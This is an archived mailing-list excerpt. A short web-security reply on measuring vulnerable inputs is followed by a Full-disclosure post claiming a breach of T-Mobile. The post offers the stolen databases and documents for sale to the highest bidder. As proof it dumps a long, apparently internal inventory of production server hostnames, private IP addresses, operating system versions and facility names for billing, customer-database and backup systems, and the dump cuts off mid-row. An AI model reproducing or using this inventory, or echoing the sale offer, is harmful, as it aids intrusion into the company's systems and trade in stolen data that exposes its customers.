[WEB SECURITY] Unicode Left/Right Pointing Double Angel Quotation Mark bypass? In-Reply-To: <1962868651.20090605104235@Zoller.lu> References: <1010180926.20070522165803@SECURITY.NNOV.RU> <43c6c8500906041622w5ad9d1car524171b3d0f0ff07@mail.gmail.com> <1962868651.20090605104235@Zoller.lu> Message-ID: response inline On Fri, Jun 5, 2009 at 1:42 AM, Thierry Zoller wrote: > The ? discussion ? of ? how ?many ?inputs ?are ?vulnerable ?is kind of > ludicrous isn't it? As it nearly always boils down to the same set of impacts > even if you have a trillion of inputs vulnerable, per domain. Measuring inputs is very valuable. A 500 page report from a scanner or consultant listing 18,000 inputs all vulnerable to the same 2 types of XSS attacks is certainly not, which is what I think you were referring to. The number of identically vulnerable inputs by density and location in an application is itself a form of metadata: It gives you a strong indication whether or not you have a Conceptual/Design problem or a Particular/Implementation issue. Nobody in Black Box land has described this correctly yet that I have seen. The discussion quickly hits a slippery slope between issues of Omission vs. issues of Commission. Omission: In the broad case, where you find a type of syntax-attack vector like these everywhere in a piece of software (n+80%?) you can usually map that to a design omission or framework flaw. Commission: In the particular case where you find a type of syntax-attack vector like these in one specific location (/noobdev.aspx) or very small percentage of inputs (n-98%?) you can usually map this to a specifically committed implementation error or the use of a dangerous library for a specific function. The differences between these are important at a strategic level in terms of how to solve/avoid the problem going forward. Measuring "exploitable defects-to-inputs" is an effective way to measure, over time, as you create/update/deprecate your code: are you getting better or worse over time at Writing Secure Code? In this sense exploitability-per-input has definite measuring-stick value. There are certainly other ways to measure, but in a Black Box perspective of CRUD-over-time effect on your code, I think this is the best way we have today to measure what direction of overall exploitability your code is moving in. There are other tactical considerations but they are outside this discussion. --- Arian Evans From pwnmobile at Safe-mail.net Sat Jun 6 20:18:06 2009 From: pwnmobile at Safe-mail.net (pwnmobile at Safe-mail.net) Date: Sat, 6 Jun 2009 15:18:06 -0400 Subject: [Full-disclosure] T-Mobile sources and data Message-ID: Hello world, The U.S. T-Mobile network predominately uses the GSM/GPRS/EDGE 1900 MHz frequency-band, making it the largest 1900 MHz network in the United States. Service is available in 98 of the 100 largest markets and 268 million potential customers. Like Checkpoint Tmobile has been owned for some time. We have everything, their databases, confidental documents, scripts and programs from their servers, financial documents up to 2009. We already contacted with their competitors and they didn't show interest in buying their data -probably because the mails got to the wrong people- so now we are offering them for the highest bidder. Please only serious offers, don't waste our time. Contact: pwnmobile at safe-mail.net Name Type Team Application Name ApplicationID Application Operating System IP Address Facility Blank Blank Blank Tier 1 Apps Tier 2 Apps ? Prod protun03 Prod IHAP Caller Tunes 64 CallerTunes 10.1.16.185 HP-UX 11.11 BOTHELL_7 #N/A 64 1 protun04 Prod IHAP Caller Tunes 64 CallerTunes 10.1.16.186 HP-UX 11.11 BOTHELL_7 #N/A 64 1 protun05 Prod IHAP Caller Tunes 64 CallerTunes 10.1.16.187 HP-UX 11.11 BOTHELL_7 #N/A 64 1 protun06 Prod IHAP Caller Tunes 64 CallerTunes 10.1.16.188 HP-UX 11.11 BOTHELL_7 #N/A 64 1 protun07 Prod IHAP Caller Tunes 64 CallerTunes 10.1.17.189 HP-UX 11.11 BOTHELL_7 #N/A 64 1 protun08 Prod IHAP Caller Tunes 64 CallerTunes 10.1.17.190 HP-UX 11.11 BOTHELL_7 #N/A 64 1 protun09 Prod IHAP Caller Tunes 64 CallerTunes 10.1.21.191 HP-UX 11.11 BOTHELL_7 #N/A 64 1 protun10 Prod IHAP Caller Tunes 64 CallerTunes 10.1.21.192 HP-UX 11.11 BOTHELL_7 #N/A 64 1 protun11 Prod IHAP Caller Tunes 64 CallerTunes 10.1.16.193 HP-UX 11.11 BOTHELL_7 #N/A 64 1 protun12 Prod IHAP Caller Tunes 64 CallerTunes 10.1.16.194 HP-UX 11.11 BOTHELL_7 #N/A 64 1 protun13 Prod IHAP Caller Tunes 64 CallerTunes 10.1.16.197 HP-UX 11.11 BOTHELL_7 #N/A 64 1 protun14 Prod IHAP Caller Tunes 64 CallerTunes 10.1.16.196 HP-UX 11.11 BOTHELL_7 #N/A 64 1 protun15 Prod IHAP Caller Tunes 64 CallerTunes 10.1.16.195 SunOS 5.8 BOTHELL_7 #N/A 64 1 protun16 Prod IHAP Caller Tunes 64 CallerTunes 10.1.16.163 HP-UX 11.11 BOTHELL_7 #N/A 64 1 procma01 Prod IHAP Campaign Management System 96 campaign management 10.133.225.60 HP-UX 11.23 NEXUS #N/A 96 1 procms01 Prod IHAP Campaign Management System 96 campaign management 10.133.113.75 HP-UX 11.11 NEXUS #N/A 96 1 procms02 Prod IHAP Campaign Management System 96 campaign management 10.133.17.66 HP-UX 11.11 NEXUS #N/A 96 1 proenb01 Prod Billing Enabler 167 enabler 10.1.16.96 HP-UX 11.11 BOTHELL_7 #N/A 167 1 proenb02 Prod Billing Enabler 167 enabler 10.1.16.98 HP-UX 11.11 BOTHELL_7 #N/A 167 1 proenb03 Prod Billing Enabler 167 enabler 10.1.16.168 HP-UX 11.11 BOTHELL_7 #N/A 167 1 proenb04 Prod Billing Enabler 167 enabler 10.1.16.166 HP-UX 11.11 BOTHELL_7 #N/A 167 1 proess01 Prod Billing Enabler 167 enabler 10.1.16.182 HP-UX 11.11 BOTHELL_7 #N/A 167 1 procvg01 Prod Billing Infinys 250 convergys - WholeSale Billing 10.1.17.32 HP-UX 11.11 BOTHELL_7 #N/A 250 1 procvg02 Prod Billing Infinys 250 convergys - WholeSale Billing 10.1.17.33 HP-UX 11.11 BOTHELL_7 #N/A 250 1 procvg03 Prod Billing Infinys 250 convergys - WholeSale Billing 10.1.24.132 SunOS 5.9 BOTHELL_7 #N/A 250 1 procvg04 Prod Billing Infinys 250 convergys - WholeSale Billing 10.1.24.133 SunOS 5.9 BOTHELL_7 #N/A 250 1 prosbl01 Prod IHAP Siebel - PRM 526 Siebel - PRM 10.1.24.21 HP-UX 11.11 BOTHELL_7 #N/A 526 1 proctl04 Prod Billing Comptel 101 comptel 10.133.81.64 HP-UX 11.11 NEXUS 101 #N/A 1 proctl05 Prod Billing Comptel 101 comptel 10.1.24.34 HP-UX 11.11 BOTHELL_7 101 #N/A 1 proctl06 Prod Billing Comptel 101 comptel 10.1.24.35 HP-UX 11.11 BOTHELL_7 101 #N/A 1 proctl07 Prod Billing Comptel 101 comptel 10.1.24.96 HP-UX 11.11 BOTHELL_7 101 #N/A 1 proctl08 Prod Billing Comptel 101 comptel 10.133.81.67 HP-UX 11.11 NEXUS 101 #N/A 1 proctl09 Prod Billing Comptel 101 Comptel 10.133.81.76 HP-UX 11.11 NEXUS 101 #N/A 1 proctl10 Prod Billing Comptel 101 comptel 10.133.81.77 HP-UX 11.11 NEXUS 101 #N/A 1 proctl11 Prod Billing Comptel 101 comptel 10.133.81.78 HP-UX 11.11 NEXUS 101 #N/A 1 proctl12 Prod Billing Comptel 101 comptel 10.133.81.79 HP-UX 11.11 NEXUS 101 #N/A 1 prodsp01 Prod IHAP DSPA 150 DSPA 10.1.80.175 HP-UX 11.11 BOTHELL_7 150 #N/A 1 prodsp03 Prod IHAP DSPA 150 DSPA 10.1.80.73 HP-UX 11.11 BOTHELL_7 150 #N/A 1 prodsp11 Prod IHAP DSPA 150 DSPA 10.133.113.37 HP-UX 11.11 NEXUS 150 #N/A 1 prodsp12 Prod IHAP DSPA 150 DSPA 10.133.113.38 HP-UX 11.11 NEXUS 150 #N/A 1 prodsp13 Prod IHAP DSPA 150 DSPA 10.133.113.39 HP-UX 11.11 NEXUS 150 #N/A 1 prodsp14 Prod IHAP DSPA 150 DSPA 10.133.113.58 HP-UX 11.11 NEXUS 150 #N/A 1 prodsp15 Prod IHAP DSPA 150 DSPA 10.133.113.59 HP-UX 11.11 NEXUS 150 #N/A 1 prodsp21 Prod IHAP DSPA 150 DSPA 10.133.113.40 HP-UX 11.11 NEXUS 150 #N/A 1 prodsp22 Prod IHAP DSPA 150 DSPA 10.133.113.41 HP-UX 11.11 NEXUS 150 #N/A 1 prowac06 Prod IHAP EAI 151 EAI - Middleware 10.1.80.91 HP-UX 11.11 BOTHELL_7 151 #N/A 1 prowac07 Prod IHAP EAI 151 EAI - Middleware 10.1.80.92 HP-UX 11.11 BOTHELL_7 151 #N/A 1 prowac08 Prod IHAP EAI 151 EAI - Middleware 10.1.80.93 HP-UX 11.11 BOTHELL_7 151 #N/A 1 prowac09 Prod IHAP EAI 151 EAI - Middleware 10.1.80.94 HP-UX 11.11 BOTHELL_7 151 #N/A 1 prowac10 Prod IHAP EAI 151 EAI - Middleware 10.1.80.95 HP-UX 11.11 BOTHELL_7 151 #N/A 1 prowac16 Prod IHAP EAI 151 EAI - Middleware 10.1.20.239 HP-UX 11.11 BOTHELL_7 151 #N/A 1 prowac17 Prod IHAP EAI 151 EAI - Middleware 10.1.20.236 HP-UX 11.11 BOTHELL_7 151 #N/A 1 proims01 Prod Billing eBill 153 Ebill 10.1.24.137 SunOS 5.8 BOTHELL_7 153 #N/A 1 proims02 Prod Billing eBill 153 Ebill 10.1.24.80 SunOS 5.8 BOTHELL_7 153 #N/A 1 proims03 Prod Billing eBill 153 Ebill 10.133.33.105 HP-UX 11.23 NEXUS 153 #N/A 1 proims04 Prod Billing eBill 153 Ebill 10.1.16.57 SunOS 5.8 BOTHELL_7 153 #N/A 1 proims05 Prod Billing eBill 153 Ebill 10.1.24.47 SunOS 5.8 BOTHELL_7 153 #N/A 1 proims06 Prod Billing eBill 153 Ebill 10.1.24.48 SunOS 5.8 BOTHELL_7 153 #N/A 1 proims07 Prod Billing eBill 153 Ebill 10.1.24.81 SunOS 5.8 BOTHELL_7 153 #N/A 1 proims08 Prod Billing eBill 153 Ebill 10.1.24.82 SunOS 5.8 BOTHELL_7 153 #N/A 1 proims09 Prod Billing eBill 153 Ebill 10.133.81.54 SunOS 5.8 NEXUS 153 #N/A 1 proims10 Prod Billing eBill 153 Ebill 10.133.81.55 SunOS 5.8 NEXUS 153 #N/A 1 projpy01 Prod IHAP JPAY 274 jpay 10.134.81.21 HP-UX 11.23 NEXUS 274 #N/A 1 projpy02 Prod IHAP JPAY 274 jpay 10.134.81.22 HP-UX 11.23 NEXUS 274 #N/A 1 projpy03 Prod IHAP JPAY 274 jpay 10.134.81.27 HP-UX 11.23 NEXUS 274 #N/A 1 projpy04 Prod IHAP JPAY 274 jpay 10.134.81.28 HP-UX 11.23 NEXUS 274 #N/A 1 projpy05 Prod IHAP JPAY 274 jpay 10.134.81.29 HP-UX 11.23 NEXUS 274 #N/A 1 projpy06 Prod IHAP JPAY 274 jpay 10.134.81.30 HP-UX 11.23 NEXUS 274 #N/A 1 projpy07 Prod IHAP JPAY 274 JPAY 10.134.81.31 HP-UX 11.23 NEXUS 274 #N/A 1 promer01 Prod IHAP Mercator 295 mercator 10.1.24.25 HP-UX 11.11 BOTHELL_7 295 #N/A 1 promer02 Prod IHAP Mercator 295 mercator 10.1.24.67 HP-UX 11.11 BOTHELL_7 295 #N/A 1 propag02 Prod Billing PAG 368 PAG 10.1.16.36 HP-UX 11.11 BOTHELL_7 368 #N/A 1 propag07 Prod Billing PAG 368 PAG 10.1.16.68 HP-UX 11.11 BOTHELL_7 368 #N/A 1 propag09 Prod Billing PAG 368 PAG 10.1.24.119 HP-UX 11.11 BOTHELL_7 368 #N/A 1 propag10 Prod Billing PAG 368 PAG 10.133.17.54 HP-UX 11.11 NEXUS 368 #N/A 1 propag11 Prod Billing PAG 368 PAG 10.133.17.55 HP-UX 11.11 NEXUS 368 #N/A 1 propag12 Prod Billing PAG 368 PAG 10.133.17.56 HP-UX 11.11 NEXUS 368 #N/A 1 propag13 Prod Billing PAG 368 PAG 10.133.17.57 HP-UX 11.11 NEXUS 368 #N/A 1 propag14 Prod Billing PAG 368 PAG 10.133.81.31 HP-UX 11.11 NEXUS 368 #N/A 1 propag15 Prod Billing PAG 368 PAG 10.133.81.32 HP-UX 11.11 NEXUS 368 #N/A 1 propag16 Prod Billing PAG 368 PAG 10.133.81.33 HP-UX 11.11 NEXUS 368 #N/A 1 propag17 Prod Billing PAG 368 PAG 10.133.81.34 HP-UX 11.11 NEXUS 368 #N/A 1 propag18 Prod Billing PAG 368 PAG 10.133.81.35 HP-UX 11.11 NEXUS 368 #N/A 1 propag19 Prod Billing PAG 368 PAG 10.133.81.37 HP-UX 11.11 NEXUS 368 #N/A 1 propag21 Prod Billing PAG 368 PAG 10.133.81.39 HP-UX 11.11 NEXUS 368 #N/A 1 propag22 Prod Billing PAG 368 PAG 10.133.81.40 HP-UX 11.11 NEXUS 368 #N/A 1 propag23 Prod Billing PAG 368 PAG 10.133.81.41 HP-UX 11.11 NEXUS 368 #N/A 1 prowms01 Prod IHAP PKMS 386 pkms 10.133.33.55 HP-UX 11.11 NEXUS 386 #N/A 1 prowms02 Prod IHAP PKMS 386 pkms 10.133.33.56 HP-UX 11.11 NEXUS 386 #N/A 1 prowms03 Prod IHAP PKMS 386 pkms 10.133.33.57 HP-UX 11.11 NEXUS 386 #N/A 1 prowms04 Prod IHAP PKMS 386 pkms 10.133.33.58 HP-UX 11.11 NEXUS 386 #N/A 1 propos01 Prod IHAP POS 390 POS 10.133.225.50 HP-UX 11.23 NEXUS 390 #N/A 1 propos02 Prod IHAP POS 390 POS 10.133.225.51 HP-UX 11.23 NEXUS 390 #N/A 1 prosap04 Prod IHAP SAP 450 SAP 10.1.16.29 HP-UX 11.11 BOTHELL_7 450 #N/A 1 prosap09 Prod IHAP SAP 450 SAP 10.1.16.62 HP-UX 11.11 BOTHELL_7 450 #N/A 1 prosap23 Prod IHAP SAP 450 SAP 10.1.16.222 HP-UX 11.11 BOTHELL_7 450 #N/A 1 prosap31 Prod IHAP SAP 450 SAP 10.1.16.110 HP-UX 11.11 BOTHELL_7 450 #N/A 1 prosap33 Prod IHAP SAP 450 SAP 10.1.16.41 HP-UX 11.11 BOTHELL_7 450 #N/A 1 prosap38 Prod IHAP SAP 450 SAP 10.1.16.175 HP-UX 11.11 BOTHELL_7 450 #N/A 1 prosap39 Prod IHAP SAP 450 SAP 10.1.16.155 HP-UX 11.11 BOTHELL_7 450 #N/A 1 protib01 Prod IHAP TIBCO 582 Tibco 10.1.16.102 HP-UX 11.11 BOTHELL_7 582 #N/A 1 protib02 Prod IHAP TIBCO 582 Tibco 10.1.81.21 HP-UX 11.11 BOTHELL_7 582 #N/A 1 protib03 Prod IHAP TIBCO 582 Tibco 10.1.81.22 HP-UX 11.11 BOTHELL_7 582 #N/A 1 protib04 Prod IHAP TIBCO 582 Tibco 10.1.81.24 HP-UX 11.11 BOTHELL_7 582 #N/A 1 protib05 Prod IHAP TIBCO 582 Tibco 10.1.81.25 HP-UX 11.11 BOTHELL_7 582 #N/A 1 protib06 Prod IHAP TIBCO 582 Tibco 10.1.81.26 HP-UX 11.11 BOTHELL_7 582 #N/A 1 protib07 Prod IHAP TIBCO 582 Tibco 10.1.81.29 HP-UX 11.11 BOTHELL_7 582 #N/A 1 protib08 Prod IHAP TIBCO 582 Tibco 10.1.81.30 HP-UX 11.11 BOTHELL_7 582 #N/A 1 protib20 Prod IHAP TIBCO 582 Tibco 10.133.87.20 HP-UX 11.11 NEXUS 582 #N/A 1 protib21 Prod IHAP TIBCO 582 Tibco 10.133.87.21 HP-UX 11.11 NEXUS 582 #N/A 1 protib22 Prod IHAP TIBCO 582 Tibco 10.133.87.22 HP-UX 11.11 NEXUS 582 #N/A 1 protib23 Prod IHAP TIBCO 582 Tibco 10.133.87.23 HP-UX 11.11 NEXUS 582 #N/A 1 protib24 Prod IHAP TIBCO 582 Tibco 10.133.87.24 HP-UX 11.11 NEXUS 582 #N/A 1 protib25 Prod IHAP TIBCO 582 Tibco 10.133.81.52 HP-UX 11.23 NEXUS 582 #N/A 1 protib26 Prod IHAP TIBCO 582 Tibco 10.133.81.53 HP-UX 11.23 NEXUS 582 #N/A 1 protib30 Prod IHAP TIBCO 582 Tibco 10.133.87.25 HP-UX 11.11 NEXUS 582 #N/A 1 protib31 Prod IHAP TIBCO 582 Tibco 10.133.87.26 HP-UX 11.11 NEXUS 582 #N/A 1 protib32 Prod IHAP TIBCO 582 Tibco 10.133.87.27 HP-UX 11.11 NEXUS 582 #N/A 1 protib40 Prod IHAP TIBCO 582 Tibco 10.133.17.101 HP-UX 11.11 NEXUS 582 #N/A 1 protib41 Prod IHAP TIBCO 582 Tibco 10.133.17.102 HP-UX 11.11 NEXUS 582 #N/A 1 protib42 Prod IHAP TIBCO 582 Tibco 10.133.81.100 HP-UX 11.11 NEXUS 582 #N/A 1 protib43 Prod IHAP TIBCO 582 Tibco 10.133.81.62 HP-UX 11.11 NEXUS 582 #N/A 1 protib44 Prod IHAP TIBCO 582 Tibco 10.133.81.63 HP-UX 11.11 NEXUS 582 #N/A 1 protib45 Prod IHAP TIBCO 582 Tibco 10.133.81.72 HP-UX 11.11 NEXUS 582 #N/A 1 protib46 Prod IHAP TIBCO 582 Tibco 10.133.81.68 HP-UX 11.11 NEXUS 582 #N/A 1 protib47 Prod IHAP TIBCO 582 Tibco 10.133.81.73 HP-UX 11.11 NEXUS 582 #N/A 1 protib98 Prod IHAP TIBCO 582 Tibco 10.1.16.106 HP-UX 11.23 BOTHELL_7 582 #N/A 1 protib99 Prod IHAP TIBCO 582 Tibco 10.1.16.107 HP-UX 11.23 BOTHELL_7 582 #N/A 1 protsf01 Prod IHAP T-Safe 614 T-Safe 10.134.82.60 HP-UX 11.23 NEXUS 614 #N/A 1 protsf02 Prod IHAP T-Safe 614 T-Safe 10.134.82.61 HP-UX 11.23 NEXUS 614 #N/A 1 protsf03 Prod IHAP T-Safe 614 T-Safe 10.134.82.62 HP-UX 11.23 NEXUS 614 #N/A 1 protsf04 Prod IHAP T-Safe 614 T-Safe 10.134.82.67 HP-UX 11.23 NEXUS 614 #N/A 1 protsf05 Prod IHAP T-Safe 614 T-Safe 10.134.82.68 HP-UX 11.23 NEXUS 614 #N/A 1 procnr01 Prod IHAP TSD 615 TSD 10.1.24.85 SunOS 5.9 BOTHELL_7 615 #N/A 1 procnr02 Prod IHAP TSD 615 TSD 10.1.24.186 SunOS 5.9 BOTHELL_7 615 #N/A 1 promst01 Prod IHAP TSD 615 TSD 10.1.24.83 SunOS 5.9 BOTHELL_7 615 #N/A 1 promst02 Prod IHAP TSD 615 TSD 10.1.24.184 SunOS 5.9 BOTHELL_7 615 #N/A 1 proter01 Prod Billing Tuxedo 619 Tuxedo 10.1.24.100 HP-UX 11.11 BOTHELL_7 619 #N/A 1 proter02 Prod Billing Tuxedo 619 Tuxedo 10.1.24.101 HP-UX 11.11 BOTHELL_7 619 #N/A 1 proter03 Prod Billing Tuxedo 619 Tuxedo 10.1.24.102 HP-UX 11.11 BOTHELL_7 619 #N/A 1 proter04 Prod Billing Tuxedo 619 Tuxedo 10.1.16.220 HP-UX 11.11 BOTHELL_7 619 #N/A 1 proter05 Prod Billing Tuxedo 619 Tuxedo 10.1.16.212 HP-UX 11.11 BOTHELL_7 619 #N/A 1 proter06 Prod Billing Tuxedo 619 Tuxedo 10.1.16.78 HP-UX 11.11 BOTHELL_7 619 #N/A 1 proter07 Prod Billing Tuxedo 619 Tuxedo 10.1.16.94 HP-UX 11.11 BOTHELL_7 619 #N/A 1 provtx05 Prod #N/A Vertex 631 Vertex 10.133.34.48 HP-UX 11.23 NEXUS 631 #N/A 1 provtx05 Prod #N/A Vertex 631 Vertex 10.133.34.48 HP-UX 11.23 NEXUS 631 #N/A 1 provtx06 Prod #N/A Vertex 631 Vertex 10.133.34.49 HP-UX 11.23 NEXUS 631 #N/A 1 pnxpbm01 Prod Projects #N/A #N/A #N/A 10.133.65.53 HP-UX 11.23 NEXUS #N/A #N/A 1 pprepr02 Prod Projects #N/A #N/A #N/A 192.168.33.129 AIX 5.3 NEXUS #N/A #N/A 1 pprepr03 Prod Projects #N/A #N/A #N/A 10.130.33.130 AIX 5.3 NEXUS #N/A #N/A 1 pprepr04 Prod Projects #N/A #N/A #N/A 10.130.33.131 AIX 5.3 NEXUS #N/A #N/A 1 pprepr05 Prod Projects #N/A #N/A #N/A 10.130.33.132 AIX 5.3 NEXUS #N/A #N/A 1 pprhrp01 Prod Projects #N/A #N/A #N/A 192.168.33.123 AIX 5.3 NEXUS #N/A #N/A 1 pprhrp02 Prod Projects #N/A #N/A #N/A 192.168.33.124 AIX 5.3 NEXUS #N/A #N/A 1 pprhrp03 Prod Projects #N/A #N/A #N/A 10.130.33.125 AIX 5.3 NEXUS #N/A #N/A 1 pprhrp04 Prod Projects #N/A #N/A #N/A 10.130.33.126 AIX 5.3 NEXUS #N/A #N/A 1 pprhrp05 Prod Projects #N/A #N/A #N/A 10.130.33.127 AIX 5.3 NEXUS #N/A #N/A 1 proact02 Prod IHAP People Soft 380 People Soft 10.1.16.23 HP-UX 11.00 BOTHELL_7 #N/A #N/A 1 proadm01 Prod IHAP Portfolio Management 389 Portfolio Management 10.133.65.31 HP-UX 11.23 NEXUS #N/A #N/A 1 proalm01 Prod IHAP asset management 27 asset management 10.1.24.140 SunOS 5.9 BOTHELL_7 #N/A #N/A 1 proalm02 Prod IHAP asset management 27 asset management 10.1.24.141 SunOS 5.9 BOTHELL_7 #N/A #N/A 1 proamdm2 Prod Billing Maestro 288 Maestro 10.1.16.39 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proapi01 Prod Billing API 19 API 10.1.24.36 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proapi02 Prod Billing API 19 API 10.1.24.37 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proapi11 Prod #N/A #N/A #N/A #N/A 10.130.225.61 HP-UX 11.23 NEXUS #N/A #N/A 1 proapi12 Prod #N/A #N/A #N/A #N/A 10.130.225.62 HP-UX 11.23 NEXUS #N/A #N/A 1 proarc01 Prod Billing Archive Engine 25 archive engine 10.1.16.58 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proarc10 Prod Billing Archive Engine 25 archive engine 10.1.17.56 SunOS 5.9 BOTHELL_7 #N/A #N/A 1 proarc11 Prod Billing Archive Engine 25 archive engine 10.1.17.58 SunOS 5.9 BOTHELL_7 #N/A #N/A 1 probck02 Prod Infra Netbackup 34 Backup/Archive server 10.1.16.25 HP-UX 11.00 BOTHELL_7 #N/A #N/A 1 probck03 Prod Infra Netbackup 34 Backup/Archive server 10.65.16.42 HP-UX 11.11 TAMPA #N/A #N/A 1 probck04 Prod Infra Netbackup 34 Backup/Archive server 10.73.17.22 HP-UX 11.11 TAMPA #N/A #N/A 1 probck06 Prod Infra Netbackup 34 Backup/Archive server 10.1.24.28 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 probck07 Prod Infra Netbackup 34 Backup/Archive server 10.1.24.29 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 probck08 Prod Infra Netbackup 34 Backup/Archive server 10.1.16.83 HP-UX 11.11 TAMPA #N/A #N/A 1 probck09 Prod Infra Netbackup 34 Backup/Archive server 10.1.16.84 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 probck10 Prod Infra Netbackup 34 Backup/Archive server 10.1.16.85 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 probck11 Prod Infra Netbackup 34 Backup/Archive server 10.1.16.115 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 probck13 Prod Infra Netbackup 34 Backup/Archive server 10.65.17.46 HP-UX 11.11 TAMPA #N/A #N/A 1 probck14 Prod Infra Netbackup 34 Backup/Archive server 10.65.84.65 HP-UX 11.23 TAMPA #N/A #N/A 1 probck15 Prod Infra Netbackup 34 Backup/Archive server 10.65.17.72 HP-UX 11.23 TAMPA #N/A #N/A 1 probck16 Prod Infra Netbackup 34 Backup/Archive server 10.65.17.73 HP-UX 11.23 TAMPA #N/A #N/A 1 probck17 Prod Infra Netbackup 34 Backup/Archive server 10.1.16.206 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 probck18 Prod Infra Netbackup 34 Backup/Archive server 10.1.16.207 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 probck19 Prod Infra Netbackup 34 Backup/Archive server 10.73.17.28 HP-UX 11.11 TAMPA #N/A #N/A 1 probck20 Prod Infra Netbackup 34 Backup/Archive server 10.73.17.27 HP-UX 11.11 TAMPA #N/A #N/A 1 probck21 Prod Infra Netbackup 34 Backup/Archive server 10.133.113.201 HP-UX 11.23 NEXUS #N/A #N/A 1 probck22 Prod Infra Netbackup 34 Backup/Archive server 10.133.113.202 HP-UX 11.23 NEXUS #N/A #N/A 1 probck23 Prod Infra Netbackup 34 Backup/Archive server 10.133.113.203 HP-UX 11.23 NEXUS #N/A #N/A 1 probck24 Prod Infra Netbackup 34 Backup/Archive server 10.133.113.204 HP-UX 11.23 NEXUS #N/A #N/A 1 probck25 Prod Infra Netbackup 34 Backup/Archive server 10.133.113.205 HP-UX 11.23 NEXUS #N/A #N/A 1 probck26 Prod Infra Netbackup 34 Backup/Archive server 10.132.113.40 HP-UX 11.11 NEXUS #N/A #N/A 1 probck27 Prod Infra Netbackup 34 Backup/Archive server 10.132.113.42 HP-UX 11.11 NEXUS #N/A #N/A 1 probck28 Prod Infra Netbackup 34 Backup/Archive server 10.133.113.51 HP-UX 11.23 NEXUS #N/A #N/A 1 probck29 Prod Infra Netbackup 34 Backup/Archive server 10.133.113.52 HP-UX 11.11 NEXUS #N/A #N/A 1 probck30 Prod #N/A #N/A #N/A #N/A 10.133.113.84 AIX 5.3 NEXUS #N/A #N/A 1 probck31 Prod #N/A #N/A #N/A #N/A 10.133.113.85 AIX 5.3 NEXUS #N/A #N/A 1 probcs01 Prod Projects #N/A #N/A #N/A 10.133.17.87 HP-UX 11.23 NEXUS #N/A #N/A 1 probcs02 Prod Projects #N/A #N/A #N/A 10.133.17.88 HP-UX 11.23 NEXUS #N/A #N/A 1 probono Prod Infra Infrastructure 253 Infrastructure 10.1.16.37 HP-UX 11.00 BOTHELL_7 #N/A #N/A 1 probono2 Prod Infra Infrastructure 253 Infrastructure 10.1.16.38 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 probpm01 Prod IHAP Business process 52 business process 10.133.225.54 HP-UX 11.11 NEXUS #N/A #N/A 1 probpm02 Prod IHAP Business process 52 business process 10.133.225.55 HP-UX 11.11 NEXUS #N/A #N/A 1 probpm03 Prod IHAP Business process 52 business process 10.133.225.48 HP-UX 11.11 NEXUS #N/A #N/A 1 probtb01 Prod IHAP Business to Business 55 Business 2 Business 10.1.201.231 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 probtb02 Prod IHAP Business to Business 55 Business 2 Business 10.1.201.232 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 probtb03 Prod IHAP Business to Business 55 Business 2 Business 10.1.201.233 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 probtb04 Prod IHAP Business to Business 55 Business 2 Business 10.1.201.234 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 procde01 Prod Billing Collection decision engine 98 collection decision engine 10.1.16.158 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 procde02 Prod Billing Collection decision engine 98 collection decision engine 10.1.16.160 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 procea01 Prod Billing Collections Enhancement 99 Collections Enhancement 10.133.81.50 SunOS 5.9 NEXUS #N/A #N/A 1 procea02 Prod Billing Collections Enhancement 99 Collections Enhancement 10.133.81.51 SunOS 5.9 NEXUS #N/A #N/A 1 procea03 Prod Billing Collections Enhancement 99 Collections Enhancement 10.1.25.22 SunOS 5.9 BOTHELL_7 #N/A #N/A 1 procen01 Prod Billing Centivia 75 centivia 10.1.16.101 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 procen03 Prod Billing Centivia 75 centivia 10.1.16.176 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 procen04 Prod Billing Centivia 75 centivia 10.1.16.177 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proclm01 Prod IHAP Credit Line Management 114 Credit Line Management 10.133.81.101 SunOS 5.10 NEXUS #N/A #N/A 1 proclm02 Prod IHAP Credit Line Management 114 Credit Line Management 10.133.81.102 HP-UX 11.23 NEXUS #N/A #N/A 1 procln01 Prod Billing Cleanup Engine 89 Cleanup Engine 10.1.16.63 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proclr01 Prod IHAP Clarity 88 Clarity 10.1.24.107 SunOS 5.9 BOTHELL_7 #N/A #N/A 1 proclr02 Prod IHAP Clarity 88 Clarity 10.1.24.108 SunOS 5.9 BOTHELL_7 #N/A #N/A 1 procnv01 Prod Billing Conversion server (Amdocs) 108 Conversion server (Amdocs) 10.1.16.137 HP-UX 11.00 BOTHELL_7 #N/A #N/A 1 procpr01 Prod Billing Customer Profile 123 Customer Profile 10.133.113.48 HP-UX 11.11 NEXUS #N/A #N/A 1 procpr02 Prod Billing Customer Profile 123 Customer Profile 10.133.113.49 HP-UX 11.11 NEXUS #N/A #N/A 1 procpw01 Prod IHAP Opt-Out T-Mo 357 Opt-Out T-Mo 10.133.81.81 HP-UX 11.23 NEXUS #N/A #N/A 1 procpw02 Prod IHAP Opt-Out T-Mo 357 Opt-Out T-Mo 10.133.81.82 HP-UX 11.23 NEXUS #N/A #N/A 1 procrd01 Prod Infra Concord 103 Concord 10.133.17.28 SunOS 5.9 NEXUS #N/A #N/A 1 procrd02 Prod Infra DNS 144 DNS 10.1.24.38 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 procst01 Prod Billing Samson - Customer DB 688 Samson - Customer DB 10.1.16.70 HP-UX 11.23 BOTHELL_7 #N/A #N/A 1 procst02 Prod Billing Samson - Customer DB 688 Samson - Customer DB 10.1.16.120 HP-UX 11.23 BOTHELL_7 #N/A #N/A 1 procst03 Prod Billing Samson - Customer DB 688 Samson - Customer DB 10.1.16.181 